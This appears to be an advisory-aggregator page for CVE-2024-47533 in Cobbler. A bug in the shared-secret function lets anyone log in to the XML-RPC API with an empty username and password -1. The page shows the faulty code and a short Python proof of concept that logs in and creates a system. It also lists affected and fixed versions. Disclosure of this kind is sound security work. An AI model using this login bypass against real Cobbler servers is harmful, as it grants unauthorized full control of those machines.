Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1tMjZjLWZjZ2gtY3A2aM4ABBeO
cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes
Summary
utils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user '' password -1 and make any changes.
Details
utils.py get_shared_secret:
def get_shared_secret() -> Union[str, int]:
"""
The 'web.ss' file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange
between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.
For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.
:return: The Cobbler secret which enables full access to Cobbler.
"""
try:
with open("/var/lib/cobbler/web.ss", 'rb', encoding='utf-8') as fd:
data = fd.read()
except:
return -1
return str(data).strip()
Always returns -1 because of the following exception:
binary mode doesn't take an encoding argument
This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.
PoC
#!/usr/bin/python3
import ssl
import xmlrpc.client
params = { 'proto': 'https', 'host': 'COBBLER_SERVER', 'port': '443', 'username': '', 'password': -1 }
ssl_context = ssl._create_unverified_context()
url = '{proto}://{host}:{port}/cobbler_api'.format(**params)
if ssl_context:
conn = xmlrpc.client.ServerProxy(url, context=ssl_context)
else:
conn = xmlrpc.client.Server(url)
try:
token = conn.login(params['username'], params['password'])
except xmlrpc.client.Fault as e:
print("Failed to log in to Cobbler '{url}' as '{username}'. {error}".format(url=url, error=e, **params))
except Exception as e:
print("Connection to '{url}' failed. {error}".format(url=url, error=e, **params))
print("Login success!")
system_id = conn.new_system(token)
Impact
This gives anyone with network access to a cobbler server full control of the server.
Permalink: https://github.com/advisories/GHSA-m26c-fcgh-cp6hJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tMjZjLWZjZ2gtY3A2aM4ABBeO
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: 2 days ago
Updated: 2 days ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-m26c-fcgh-cp6h, CVE-2024-47533
References:
- https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h
- https://nvd.nist.gov/vuln/detail/CVE-2024-47533
- https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0
- https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda
- https://github.com/advisories/GHSA-m26c-fcgh-cp6h
Blast Radius: 10.2
Affected Packages
pypi:cobbler
Dependent packages: 0Dependent repositories: 11
Downloads: 1,176 last month
Affected Version Ranges: >= 3.0.0, < 3.2.3, >= 3.3.0, < 3.3.7
Fixed in: 3.2.3, 3.3.7
All affected versions: 3.1.2, 3.2.1, 3.2.2, 3.3.0, 3.3.1, 3.3.2, 3.3.3, 3.3.4, 3.3.5, 3.3.6
All unaffected versions: 3.2.3, 3.3.7